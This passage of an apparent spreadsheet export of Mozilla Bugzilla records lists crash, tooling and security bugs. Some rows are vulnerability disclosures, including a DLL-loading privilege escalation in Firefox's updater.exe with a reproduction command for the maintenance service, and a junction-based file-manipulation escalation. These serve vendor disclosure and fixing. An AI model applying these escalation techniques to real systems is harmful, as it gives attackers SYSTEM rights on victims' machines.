4. Go to http://market.yandex.ru/guru.xml?CMD=-RR=0,0,0,0-VIS=160-CAT_ID=754893-EXC=1-PG=50&amp;view=&amp;num=&amp;sort=&amp;hid=91020&amp;filter=&amp;grhow=
Observed results:
Panel on the right shows a progress indicator that never goes away.
Expected results:
The panel on the right should load eventually (usually within a few seconds).
Requesting blocking1.9.1 because this doesn't seem to be limited to this website or even to jQuery.</t>
        </is>
      </c>
      <c r="X2604" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2605">
      <c r="A2605" t="n">
        <v>830134</v>
      </c>
      <c r="B2605" t="inlineStr">
        <is>
          <t>2013-01-13 11:40:52 -0800</t>
        </is>
      </c>
      <c r="C2605" t="inlineStr">
        <is>
          <t>The updater.exe loads the cryptsp.dll from the update directory while perfoming an update.</t>
        </is>
      </c>
      <c r="D2605" t="inlineStr">
        <is>
          <t>2024-05-30 07:59:27 -0700</t>
        </is>
      </c>
      <c r="E2605" t="n">
        <v>1</v>
      </c>
      <c r="F2605" t="n">
        <v>1</v>
      </c>
      <c r="G2605" t="n">
        <v>3</v>
      </c>
      <c r="H2605" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2605" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2605" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2605" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L2605" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2605" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2605" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2605" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2605" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q2605" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2605" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2605" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T2605" t="n">
        <v>1</v>
      </c>
      <c r="U2605" t="n">
        <v>0</v>
      </c>
      <c r="V2605" t="n">
        <v>46</v>
      </c>
      <c r="W2605" t="inlineStr">
        <is>
          <t>Besides fixed Bug 750850 the updater.exe in FF 18.0 is vulnerable to a LoadLibrary-based attack. The exe loads the cryptsp.dll from the update directory while perfoming an update.
Reproduce:
I have attached a poc to perfom an update of 18.0 to 18.0 (feature or bug?) which I have tested on win7 pro 32bit and 64bit with Firefox 18.0. 
1.) Download the poc and extract the files.
2.) Download "http://releases.mozilla.org/pub/mozilla.org/firefox/releases/latest/update/win32/en-US/firefox-18.0.complete.mar" and save the file as "update.mar" in the poc directory.
3.) Execute:
	sc start MozillaMaintenance MozillaMaintenance software-update &lt;path_to_poc_dir+\updater.exe&gt; &lt;path_to_poc_dir&gt; &lt;path_to_firefox_dir+\updated&gt; -1
for example:
	sc start MozillaMaintenance MozillaMaintenance software-update "C:\Users\Ash\Desktop\poc\updater.exe" "C:\Users\Ash\Desktop\poc" "C:\Program Files (x86)\Mozilla Firefox\updated" -1
to start the maintainservice. The fake "cryptsp.dll" executes system("calc") in DLLMain so you will see a calc.exe and a cmd.exe running with system rights in the process list. Kill the calc.exe to finish the "update".
The cryptsp.dll from the system directory should be loaded.</t>
        </is>
      </c>
      <c r="X2605" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2606">
      <c r="A2606" t="n">
        <v>1142559</v>
      </c>
      <c r="B2606" t="inlineStr">
        <is>
          <t>2015-03-12 09:00:16 -0700</t>
        </is>
      </c>
      <c r="C2606" t="inlineStr">
        <is>
          <t>Non-buildbot jobs are missing reftest analyser links</t>
        </is>
      </c>
      <c r="D2606" t="inlineStr">
        <is>
          <t>2015-05-20 04:33:02 -0700</t>
        </is>
      </c>
      <c r="E2606" t="n">
        <v>1</v>
      </c>
      <c r="F2606" t="n">
        <v>1</v>
      </c>
      <c r="G2606" t="n">
        <v>7</v>
      </c>
      <c r="H2606" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2606" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2606" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2606" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2606" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2606" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2606" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2606" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2606" t="inlineStr"/>
      <c r="Q2606" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2606" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2606" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2606" t="n">
        <v>1</v>
      </c>
      <c r="U2606" t="n">
        <v>0</v>
      </c>
      <c r="V2606" t="n">
        <v>6</v>
      </c>
      <c r="W2606" t="inlineStr">
        <is>
          <t>In https://github.com/mozilla/treeherder-ui/commit/b9a4d69dc529e119600e559827a9c90533c67ce0#diff-0af1808803ab23d50ea1816f20fdb120R134 , the list of log urls was filtered to exclude the new json log urls.
However a whitelist approach was taken, which means that other log names (eg "live_backing.log") are excluded too.
This means that for taskcluster reftest jobs, the link to the reftest analyser isn't shown.</t>
        </is>
      </c>
      <c r="X2606" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2607">
      <c r="A2607" t="n">
        <v>1421313</v>
      </c>
      <c r="B2607" t="inlineStr">
        <is>
          <t>2017-11-28 08:29:23 -0800</t>
        </is>
      </c>
      <c r="C2607" t="inlineStr">
        <is>
          <t>Crash in wcsrtombs</t>
        </is>
      </c>
      <c r="D2607" t="inlineStr">
        <is>
          <t>2022-11-29 17:18:21 -0800</t>
        </is>
      </c>
      <c r="E2607" t="n">
        <v>1</v>
      </c>
      <c r="F2607" t="n">
        <v>1</v>
      </c>
      <c r="G2607" t="n">
        <v>6</v>
      </c>
      <c r="H2607" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2607" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2607" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2607" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="L2607" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2607" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2607" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2607" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2607" t="inlineStr"/>
      <c r="Q2607" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2607" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2607" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T2607" t="n">
        <v>1</v>
      </c>
      <c r="U2607" t="n">
        <v>0</v>
      </c>
      <c r="V2607" t="n">
        <v>38</v>
      </c>
      <c r="W2607" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-12bcdc0c-67e0-4fc7-b453-0c7ea0171128.
=============================================================
Seen while looking at 58 beta crash stats: http://bit.ly/2BjHXMi. Affects 59 and 58. #7 top crash in the most recent b5.
Comments:
*while playing quizzclub trivia I was reading the response to the first question when the crash happened 
Top 10 frames of crashing thread:
0 libxul.so wcsrtombs 
1 libxul.so nsBaseHashtable&amp;lt;nsRefPtrHashKey&amp;lt;nsAtom&amp;gt;, EventNameMapping, EventNameMapping&amp;gt;::Get xpcom/ds/nsTHashtable.h:135
2 libxul.so nsContentUtils::IsEventAttributeName dom/base/nsContentUtils.cpp:4440
3 libxul.so nsGenericHTMLElement::GetWidthHeightForImage dom/html/nsGenericHTMLElement.cpp
4 libxul.so nsGenericHTMLElement::AfterSetAttr dom/html/nsGenericHTMLElement.cpp:707
5 libxul.so nsAttrAndChildArray::SetAndSwapAttr dom/base/nsAttrAndChildArray.cpp:408
6 libxul.so nsAttrValueOrString::IsEmpty dom/base/nsAttrValueOrString.h:93
7 libxul.so mozilla::dom::Element::SetAttrAndNotify dom/base/Element.cpp:2797
8 libmozglue.so arena_t::DallocSmall memory/build/rb.h:150
9 libmozglue.so arena_dalloc memory/build/mozjemalloc.cpp:3605
=============================================================</t>
        </is>
      </c>
      <c r="X2607" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2608">
      <c r="A2608" t="n">
        <v>153480</v>
      </c>
      <c r="B2608" t="inlineStr">
        <is>
          <t>2002-06-21 15:25:36 -0700</t>
        </is>
      </c>
      <c r="C2608" t="inlineStr">
        <is>
          <t>crash deleting download manager entries Trunk M1BR [@ InMemoryArcsEnumeratorImpl::HasMoreElements]</t>
        </is>
      </c>
      <c r="D2608" t="inlineStr">
        <is>
          <t>2018-08-03 07:06:55 -0700</t>
        </is>
      </c>
      <c r="E2608" t="n">
        <v>1</v>
      </c>
      <c r="F2608" t="n">
        <v>1</v>
      </c>
      <c r="G2608" t="n">
        <v>6</v>
      </c>
      <c r="H2608" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2608" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2608" t="inlineStr">
        <is>
          <t>RDF</t>
        </is>
      </c>
      <c r="K2608" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2608" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2608" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2608" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2608" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2608" t="inlineStr">
        <is>
          <t>[adt2 rtm]</t>
        </is>
      </c>
      <c r="Q2608" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2608" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2608" t="inlineStr">
        <is>
          <t>mozilla1.1beta</t>
        </is>
      </c>
      <c r="T2608" t="n">
        <v>1</v>
      </c>
      <c r="U2608" t="n">
        <v>0</v>
      </c>
      <c r="V2608" t="n">
        <v>52</v>
      </c>
      <c r="W2608" t="inlineStr">
        <is>
          <t>("Oh", he thought. "What could possibly go wrong.").
I noticed that in the trunk builds for Jun 20, after the checkin for bug 142824
("Downloads.rdf keeps on growing") which changed the code in RemoveDownloads
to clean up the resources from downloads.rdf, that, hrm, one of the new 
topcrashers was the following stack. 
However, it's a little skewed as a topcrash entry, since 16 of the 18 entries 
are from aha@pinknet.cz who duly submitted the entries :-). What would 
help in getting this resolved would be if Adam could provide a copy of the
downloads.rdf that is crashing for him. Is that possible (either as an attachment
or maybe better as private email)? That should make it pretty straight forward
to duplicate this crash in a debugger.
InMemoryArcsEnumeratorImpl::HasMoreElements
[c:/builds/seamonkey/mozilla/rdf/base/src/nsInMemoryDataSource.cpp, line 783]
nsDownloadManager::RemoveDownload
[c:/builds/seamonkey/mozilla/xpfe/components/download-manager/src/nsDownloadManager.cpp,
line 666]
XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp,
line 106]
XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp, line 1996]
XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp,
line 1267]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 790]
js_Interpret [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 2744]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 806]
nsXPCWrappedJSClass::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp, line 1195]
nsXPCWrappedJS::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp, line 430]
PrepareAndDispatch
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp,
line 117]
SharedStub
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp,
line 139]
XPTC_InvokeByIndex
[c:/builds/seamonkey/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp,
line 106]
XPCWrappedNative::CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp, line 1996]
XPC_WN_CallMethod
[c:/builds/seamonkey/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp,
line 1267]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 790]
js_Interpret [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 2744]
js_Invoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 806]
js_InternalInvoke [c:/builds/seamonkey/mozilla/js/src/jsinterp.c, line 881]
JS_CallFunctionValue [c:/builds/seamonkey/mozilla/js/src/jsapi.c, line 3430]
nsJSContext::CallEventHandler
[c:/builds/seamonkey/mozilla/dom/src/base/nsJSEnvironment.cpp, line 1045]
nsJSEventListener::HandleEvent
[c:/builds/seamonkey/mozilla/dom/src/events/nsJSEventListener.cpp, line 184]
nsEventListenerManager::HandleEventSubType
[c:/builds/seamonkey/mozilla/content/events/src/nsEventListenerManager.cpp, line
1222]
nsEventListenerManager::HandleEvent
[c:/builds/seamonkey/mozilla/content/events/src/nsEventListenerManager.cpp, line
2221]
nsXULElement::HandleDOMEvent
[c:/builds/seamonkey/mozilla/content/xul/content/src/nsXULElement.cpp, line 3447]
PresShell::HandleDOMEventWithTarget
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp, line 6216]
nsButtonBoxFrame::MouseClicked
[c:/builds/seamonkey/mozilla/layout/xul/base/src/nsButtonBoxFrame.cpp, line 192]
nsButtonBoxFrame::HandleEvent
[c:/builds/seamonkey/mozilla/layout/xul/base/src/nsButtonBoxFrame.cpp, line 142]
PresShell::HandleEventInternal
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp, line 6185]
PresShell::HandleEventWithTarget
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp, line 6136]
nsEventStateManager::CheckForAndDispatchClick
[c:/builds/seamonkey/mozilla/content/events/src/nsEventStateManager.cpp, line 2751]
nsEventStateManager::PostHandleEvent
[c:/builds/seamonkey/mozilla/content/events/src/nsEventStateManager.cpp, line 1757]
PresShell::HandleEventInternal
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp, line 6189]
PresShell::HandleEvent
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp, line 6091]
nsViewManager::HandleEvent
[c:/builds/seamonkey/mozilla/view/src/nsViewManager.cpp, line 2085]
nsView::HandleEvent [c:/builds/seamonkey/mozilla/view/src/nsView.cpp, line 306]
nsViewManager::DispatchEvent
[c:/builds/seamonkey/mozilla/view/src/nsViewManager.cpp, line 1896]
HandleEvent [c:/builds/seamonkey/mozilla/view/src/nsView.cpp, line 83]
nsWindow::DispatchEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp, line 1029]
nsWindow::DispatchWindowEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp, line 1046]
nsWindow::DispatchMouseEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp, line 4932]
ChildWindow::DispatchMouseEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp, line 5187]
nsWindow::ProcessMessage
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp, line 3759]
nsWindow::WindowProc
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp, line 1291]
USER32.DLL + 0x2e98 (0x77e12e98)
USER32.DLL + 0x30e0 (0x77e130e0)
USER32.DLL + 0x5824 (0x77e15824)
nsAppShellService::Run
[c:/builds/seamonkey/mozilla/xpfe/appshell/src/nsAppShellService.cpp, line 458]
main1 [c:/builds/seamonkey/mozilla/xpfe/bootstrap/nsAppRunner.cpp, line 1472]
main [c:/builds/seamonkey/mozilla/xpfe/bootstrap/nsAppRunner.cpp, line 1808]
WinMain [c:/builds/seamonkey/mozilla/xpfe/bootstrap/nsAppRunner.cpp, line 1826]
WinMainCRTStartup()
KERNEL32.DLL + 0x17d08 (0x77e97d08)</t>
        </is>
      </c>
      <c r="X2608" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2609">
      <c r="A2609" t="n">
        <v>1524732</v>
      </c>
      <c r="B2609" t="inlineStr">
        <is>
          <t>2019-02-01 17:52:56 -0800</t>
        </is>
      </c>
      <c r="C2609" t="inlineStr">
        <is>
          <t>perfherder graphs y-axis are hard to read for large values</t>
        </is>
      </c>
      <c r="D2609" t="inlineStr">
        <is>
          <t>2019-12-08 23:43:45 -0800</t>
        </is>
      </c>
      <c r="E2609" t="n">
        <v>1</v>
      </c>
      <c r="F2609" t="n">
        <v>1</v>
      </c>
      <c r="G2609" t="n">
        <v>7</v>
      </c>
      <c r="H2609" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2609" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2609" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K2609" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2609" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2609" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2609" t="inlineStr"/>
      <c r="Q2609" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2609" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2609" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2609" t="n">
        <v>1</v>
      </c>
      <c r="U2609" t="n">
        <v>0</v>
      </c>
      <c r="V2609" t="n">
        <v>2</v>
      </c>
      <c r="W2609" t="inlineStr">
        <is>
          <t>See e.g. https://treeherder.mozilla.org/perf.html#/graphs?timerange=31536000&amp;series=mozilla-beta,1667439,1,4&amp;selected=mozilla-beta,1667439,325017,447216141,4
Are the labels tens of millions, hundreds of millions, billions? It takes a while to figure out.
Commas would go a long way ; SI prefixes would be better, but then some people might start wondering if they're 1000-based or 1024-based.</t>
        </is>
      </c>
      <c r="X2609" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2610">
      <c r="A2610" t="n">
        <v>1231761</v>
      </c>
      <c r="B2610" t="inlineStr">
        <is>
          <t>2015-12-10 11:19:00 -0800</t>
        </is>
      </c>
      <c r="C2610" t="inlineStr">
        <is>
          <t>DoS loading a specially crafted image in Firefox 43.0b9</t>
        </is>
      </c>
      <c r="D2610" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:51 -0700</t>
        </is>
      </c>
      <c r="E2610" t="n">
        <v>1</v>
      </c>
      <c r="F2610" t="n">
        <v>1</v>
      </c>
      <c r="G2610" t="n">
        <v>3</v>
      </c>
      <c r="H2610" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2610" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2610" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2610" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L2610" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2610" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2610" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2610" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2610" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q2610" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2610" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2610" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2610" t="n">
        <v>1</v>
      </c>
      <c r="U2610" t="n">
        <v>0</v>
      </c>
      <c r="V2610" t="n">
        <v>11</v>
      </c>
      <c r="W2610" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151030084315
Steps to reproduce:
A DoS was found in the last version of Firefox Beta (Firefox 43.0b9). Just loading this website:
http://dcc.fceia.unr.edu.ar/~ggrieco/crash.html
Actual results:
Firefox will abort/crash:
out of memory: 0xFFFFFFFFFFE40028 bytes requested
Program received signal SIGSEGV, Segmentation fault.
0x00000000004088bf in mozalloc_abort(char const*) ()
(gdb) bt
#0  0x00000000004088bf in mozalloc_abort(char const*) ()
#1  0x0000000000408931 in mozalloc_handle_oom(unsigned long) ()
#2  0x0000000000404f7d in moz_xmalloc ()
#3  0x00007ffff1a6b221 in ?? () from /home/g/Apps/firefox/libxul.so
#4  0x00007ffff1a6b438 in ?? () from /home/g/Apps/firefox/libxul.so
#5  0x00007ffff1a7f386 in ?? () from /home/g/Apps/firefox/libxul.so
#6  0x00007ffff1a69f6c in ?? () from /home/g/Apps/firefox/libxul.so
#7  0x00007ffff1a6b1b0 in ?? () from /home/g/Apps/firefox/libxul.so
#8  0x00007ffff1a6ec43 in ?? () from /home/g/Apps/firefox/libxul.so
#9  0x00007ffff1a6ee22 in ?? () from /home/g/Apps/firefox/libxul.so
#10 0x00007ffff10a9f9a in ?? () from /home/g/Apps/firefox/libxul.so
#11 0x00007ffff10b1d59 in ?? () from /home/g/Apps/firefox/libxul.so
#12 0x00007ffff160eee7 in ?? () from /home/g/Apps/firefox/libxul.so
#13 0x00007ffff15fd2a2 in ?? () from /home/g/Apps/firefox/libxul.so
#14 0x00007ffff1402ccf in ?? () from /home/g/Apps/firefox/libxul.so
#15 0x00007ffff66eaa55 in ?? () from /home/g/Apps/firefox/libnspr4.so
#16 0x00007ffff7bc4182 in start_thread (arg=0x7fffccc12700) at pthread_create.c:312
#17 0x00007ffff6cc547d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
(sorry for the lack of symbols, i couldn't find an updated version of Firefox with debugging symbols enabled and ASAN provided no more details)
Since Firefox is failing trying to allocate such a large amount of memory maybe there is a integer overflow somewhere, so i'm very interested to know which is the cause of this issue. That's why i'm flagging this issue as a security related bug.
Expected results:
It shouldn't abort (for instance, Firefox 42 is *not* affected)</t>
        </is>
      </c>
      <c r="X2610" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2611">
      <c r="A2611" t="n">
        <v>29870</v>
      </c>
      <c r="B2611" t="inlineStr">
        <is>
          <t>2000-03-01 16:38:30 -0800</t>
        </is>
      </c>
      <c r="C2611" t="inlineStr">
        <is>
          <t>Visit http://w3/ causes innfinite loop then crash</t>
        </is>
      </c>
      <c r="D2611" t="inlineStr">
        <is>
          <t>2001-05-30 16:56:06 -0700</t>
        </is>
      </c>
      <c r="E2611" t="n">
        <v>1</v>
      </c>
      <c r="F2611" t="n">
        <v>1</v>
      </c>
      <c r="G2611" t="n">
        <v>3</v>
      </c>
      <c r="H2611" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2611" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2611" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K2611" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2611" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2611" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2611" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2611" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2611" t="inlineStr">
        <is>
          <t>[PDT+] w/b minus on 3/7</t>
        </is>
      </c>
      <c r="Q2611" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2611" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2611" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T2611" t="n">
        <v>1</v>
      </c>
      <c r="U2611" t="n">
        <v>0</v>
      </c>
      <c r="V2611" t="n">
        <v>14</v>
      </c>
      <c r="W2611" t="inlineStr">
        <is>
          <t>Using today's (0301200) release build, visit http://w3/ cause infinite loop and 
eventually crashing. 
This sounds to me a beta1 stopper.</t>
        </is>
      </c>
      <c r="X2611" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2612">
      <c r="A2612" t="n">
        <v>1177861</v>
      </c>
      <c r="B2612" t="inlineStr">
        <is>
          <t>2015-06-26 12:58:07 -0700</t>
        </is>
      </c>
      <c r="C2612" t="inlineStr">
        <is>
          <t>Arbitrary file manipulation through updater.exe (Privilege Escalation)</t>
        </is>
      </c>
      <c r="D2612" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:39 -0700</t>
        </is>
      </c>
      <c r="E2612" t="n">
        <v>1</v>
      </c>
      <c r="F2612" t="n">
        <v>1</v>
      </c>
      <c r="G2612" t="n">
        <v>3</v>
      </c>
      <c r="H2612" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2612" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2612" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2612" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2612" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2612" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2612" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q2612" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2612" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2612" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2612" t="n">
        <v>1</v>
      </c>
      <c r="U2612" t="n">
        <v>0</v>
      </c>
      <c r="V2612" t="n">
        <v>41</v>
      </c>
      <c r="W2612" t="inlineStr">
        <is>
          <t>Created attachment 8626686
poc.zip
The updater.exe which is shipped with Firefox 38.0.5 opens the possibility for a local user to manipulate arbitrary files. That can be exploited for example with the maintenance service to run arbitrary executables files with the same privileges as the service.
The vulnerability exists in the process of executing a staged update. During this process the updated files are written to an user controlled working directory. Also temporary update files like *.patch files are written to this directory. As in Bug #925747 these files can be manipulated to change how files are updated, if the attacker sets the working directory path to a writeable location. Manipulations are limited to files in the working directory but with a junction it is possible to break out of the working directory and change arbitrary files. Different to hard links a standard windows user has the rights to create junctions (win7).
The poc needs firefox 38.0.5 (http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/38.0.5/win32/en-US/Firefox%20Setup%2038.0.5.exe) installed to "C:\Program Files (x86)\Mozilla Firefox", the maintenance service and ruby. I have tested the poc with win7 pro. The poc tries to execute a staged update with a junction-prepared working directory and manipulated .manifest and .patch files. For the manipulation the right timing is needed so the poc tries again if it fails. On my computer I need 3-20 tries. After the poc succeeded the content of the helper.exe in the firefox directory is replaced with the content of the standard cmd.exe of windows. And this replaced helper.exe is running in the background with system rights (after an update with the maintenance service the service executes the helper.exe if an updater.ini is present).</t>
        </is>
      </c>
      <c r="X2612" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2613">
      <c r="A2613" t="n">
        <v>897676</v>
      </c>
      <c r="B2613" t="inlineStr">
        <is>
          <t>2013-07-24 14:07:42 -0700</t>
        </is>
      </c>
      <c r="C2613" t="inlineStr">
        <is>
          <t>GC hazard in XPCWrappedNative::WrapNewGlobal with AutoMarkingNativeScriptableInfoPtr</t>
        </is>
      </c>
      <c r="D2613" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:54 -0800</t>
        </is>
      </c>
      <c r="E2613" t="n">
        <v>1</v>
      </c>
      <c r="F2613" t="n">
        <v>1</v>
      </c>
      <c r="G2613" t="n">
        <v>3</v>
      </c>
      <c r="H2613" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
